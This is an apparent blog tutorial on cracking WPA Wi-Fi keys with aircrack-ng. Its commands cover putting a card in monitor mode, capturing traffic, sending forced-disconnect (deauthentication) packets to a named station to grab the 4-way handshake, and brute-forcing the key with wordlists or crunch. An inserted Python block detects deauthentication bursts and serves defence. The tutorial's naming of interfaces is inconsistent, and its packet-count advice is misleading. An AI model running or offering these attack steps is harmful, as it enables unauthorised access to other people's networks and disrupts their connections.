Cracking WPA encryption


Install aircrack-ng using the Synaptic package manager on Ubuntu (or apt-get), or use MacPorts on a Mac.

Open a terminal and run the following.
NOTE: airmon-ng will not work on a Mac.
airmon-ng

Note down your wlan interface number; you might need it later.
Then run:

airmon-ng start wlan0 11

wlan0 is the name of the interface and 11 is the channel.
Verify that the monitor has started by running:

airmon-ng

You can check the details using:

iwconfig

Use the following to start airodump-ng and capture all wireless packets:

airodump-ng -c 11 -w psk ath0

UPDATE: On a Mac you can use the airport utility to create a dump / sniff packets.

You need to enable the airport command-line utility. On the Mac you can use airport -s to scan for all networks in range, and run
airport sniff "channel #"
to sniff all packets on the channel and log them. The .cap file can be found in the /tmp folder.

Get the BSSID and STATION ID from the airodump-ng output and use them with aireplay-ng to send out a disconnect packet. This forces Wi-Fi devices to send out a 4-way WPA authentication, which you can capture.

                    BSSID                STATION ID
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0
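
A defender's view of the disconnect packets described above, as an added example that is not part of the original post: it parses raw 802.11 frames and flags bursts of deauthentication frames aimed at one station. The function names, the window and threshold defaults, and the sample frames are assumptions constructed for illustration.

```python
import struct
from collections import defaultdict

DEAUTH = 0xC0  # first frame-control byte: management frame, subtype 12 (deauthentication)

def mac(raw):
    return ":".join(f"{b:02X}" for b in raw)

def parse_deauth(frame):
    """Return (station, bssid, reason) for a raw 802.11 deauth frame (no radiotap), else None."""
    if len(frame) < 26 or frame[0] != DEAUTH:
        return None
    dest, src, bssid = mac(frame[4:10]), mac(frame[10:16]), mac(frame[16:22])
    (reason,) = struct.unpack_from("<H", frame, 24)  # reason code follows the 24-byte header
    station = dest if src == bssid else src  # whichever end is not the AP
    return station, bssid, reason

def find_deauth_bursts(capture, window=1.0, threshold=10):
    """Map (bssid, station) to the peak deauth count inside any `window` seconds, for pairs
    reaching `threshold` (assumed defaults). capture: iterable of (timestamp_s, frame_bytes)."""
    seen = defaultdict(list)
    for ts, frame in capture:
        parsed = parse_deauth(frame)
        if parsed:
            seen[(parsed[1], parsed[0])].append(ts)
    alerts = {}
    for pair, stamps in seen.items():
        stamps.sort()
        start = 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:  # slide the window's left edge forward
                start += 1
            if end - start + 1 >= threshold:
                alerts[pair] = max(alerts.get(pair, 0), end - start + 1)
    return alerts

def build(fc0, dest, src, bssid, body=b""):  # constructs a minimal frame for the sample data
    addrs = b"".join(bytes.fromhex(m.replace(":", "")) for m in (dest, src, bssid))
    return bytes([fc0, 0, 0, 0]) + addrs + b"\x00\x00" + body

# Constructed sample: the page's example BSSID and station, one burst plus normal traffic.
AP, STA, OTHER = "00:14:6C:7E:40:80", "00:0F:B5:FD:FB:C2", "00:11:22:33:44:55"
SAMPLE = [(10.0 + i * 0.005, build(0xC0, STA, AP, AP, b"\x07\x00")) for i in range(64)]
SAMPLE += [(3.0, build(0xC0, AP, OTHER, AP, b"\x03\x00")),                 # single deauth
           (4.0, build(0x80, "FF:FF:FF:FF:FF:FF", AP, AP, b"\x00" * 12))]  # beacon

if __name__ == "__main__":
    for (bssid, station), n in find_deauth_bursts(SAMPLE).items():
        print(f"deauth burst: {n} frames within 1 s, BSSID {bssid}, station {station}")
```

With 802.11w Protected Management Frames enabled, associated stations discard unauthenticated deauthentication frames like these.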

Once you feel you have captured enough packets (10-15k), you can use aircrack-ng to crack the key:

aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap

You can use this simple C code to create word combinations and pipe the STDOUT to aircrack-ng:

permuate -d -m 8 | aircrack-ng psk*.cap -w -

Or you can use crunch and do this:
crunch 9 9 abcdefg | aircrack-ng psk*.cap -w -
